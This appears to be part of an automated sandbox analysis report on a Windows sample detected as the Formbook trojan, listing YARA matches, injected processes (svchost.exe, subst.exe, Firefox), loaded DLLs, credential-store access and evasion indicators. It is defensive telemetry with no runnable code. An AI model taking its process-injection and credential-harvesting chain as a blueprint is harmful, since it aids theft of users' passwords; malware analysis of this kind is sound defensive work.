            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0085A1E04_2_0085A1E0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0083C9A04_2_0083C9A0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0083CBC04_2_0083CBC0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0083AC404_2_0083AC40
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084330E4_2_0084330E
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008433104_2_00843310
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_02E6B1584_2_02E6B158
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_02E6BC384_2_02E6BC38
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_02E6BD534_2_02E6BD53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 105 times
            Source: C:\Windows\SysWOW64\subst.exeCode function: String function: 03157E54 appears 107 times
            Source: C:\Windows\SysWOW64\subst.exeCode function: String function: 0317EA12 appears 86 times
            Source: C:\Windows\SysWOW64\subst.exeCode function: String function: 0318F290 appears 103 times
            Source: C:\Windows\SysWOW64\subst.exeCode function: String function: 030FB970 appears 262 times
            Source: C:\Windows\SysWOW64\subst.exeCode function: String function: 03145130 appears 58 times
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: String function: 001C0D27 appears 70 times
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: String function: 001A7F41 appears 35 times
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: String function: 001C8B40 appears 42 times
            Source: 7RsDGpyOQk.exe, 00000000.00000003.1699446099.0000000003653000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 7RsDGpyOQk.exe
            Source: 7RsDGpyOQk.exe, 00000000.00000003.1699972884.00000000037FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 7RsDGpyOQk.exe
            Source: 7RsDGpyOQk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020A2D5 GetLastError,FormatMessageW,0_2_0020A2D5
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F8713 AdjustTokenPrivileges,CloseHandle,0_2_001F8713
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001F8CC3
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0020B59E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0021F121
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0020C602
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001A4FE9
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeFile created: C:\Users\user\AppData\Local\Temp\autE71E.tmpJump to behavior
            Source: 7RsDGpyOQk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: subst.exe, 00000004.00000003.2145243549.0000000002D03000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.2145132781.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4162582023.0000000002D03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 7RsDGpyOQk.exeReversingLabs: Detection: 79%
            Source: unknownProcess created: C:\Users\user\Desktop\7RsDGpyOQk.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeProcess created: C:\Windows\SysWOW64\subst.exe "C:\Windows\SysWOW64\subst.exe"
            Source: C:\Windows\SysWOW64\subst.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeProcess created: C:\Windows\SysWOW64\subst.exe "C:\Windows\SysWOW64\subst.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\subst.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 7RsDGpyOQk.exeStatic file information: File size 1230848 > 1048576
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 7RsDGpyOQk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: subst.pdb source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: subst.pdbGCTL source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJCHZIamnVz.exe, 00000003.00000000.1891445097.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035492921.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: 7RsDGpyOQk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 7RsDGpyOQk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 7RsDGpyOQk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 7RsDGpyOQk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 7RsDGpyOQk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021C304 LoadLibraryA,GetProcAddress,0_2_0021C304
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001AC590 push eax; retn 001Ah0_2_001AC599
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00208719 push FFFFFF8Bh; iretd 0_2_0020871B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CE94F push edi; ret 0_2_001CE951
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CEA68 push esi; ret 0_2_001CEA6A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C8B85 push ecx; ret 0_2_001C8B98
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CEC43 push esi; ret 0_2_001CEC45
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CED2C push edi; ret 0_2_001CED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00406075 push edx; ret 1_2_00406076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004081FF push ss; retf 1_2_00408207
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031B0 push eax; ret 1_2_004031B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404C14 push ebx; ret 1_2_00404C25
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CE6D push esi; iretd 1_2_0040CE6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417F3B push ecx; retf C78Bh1_2_00417ED6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087AB push ecx; retf 1_2_004087AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx1_2_03B309B6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D225F pushad ; ret 4_2_030D27F9
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D27FA pushad ; ret 4_2_030D27F9
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031009AD push ecx; mov dword ptr [esp], ecx4_2_031009B6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D283D push eax; iretd 4_2_030D2858
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D1368 push eax; iretd 4_2_030D1369
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008500E0 push FFFFFFA5h; ret 4_2_008500E5
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0085034C push FFFFFFFCh; iretd 4_2_00850350
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084AD2C push edx; ret 4_2_0084AD5B
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00832EC2 push edx; ret 4_2_00832EC3
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00853020 push es; iretd 4_2_00853050
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084B02D push ebx; ret 4_2_0084B02E
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0083504C push ss; retf 4_2_00835054
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084D077 push cs; rep ret 4_2_0084D075
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008372F0 pushfd ; retf 4_2_008373D2
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008355F8 push ecx; retf 4_2_008355FA
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008496FD push eax; retf 4_2_008496FE

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001A4A35
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_002255FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_002255FD
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001C33C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeAPI/Special instruction interceptor: Address: 34D3204
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\subst.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
            Source: C:\Windows\SysWOW64\subst.exeWindow / User API: threadDelayed 9756Jump to behavior
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100664
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeAPI coverage: 4.7 %
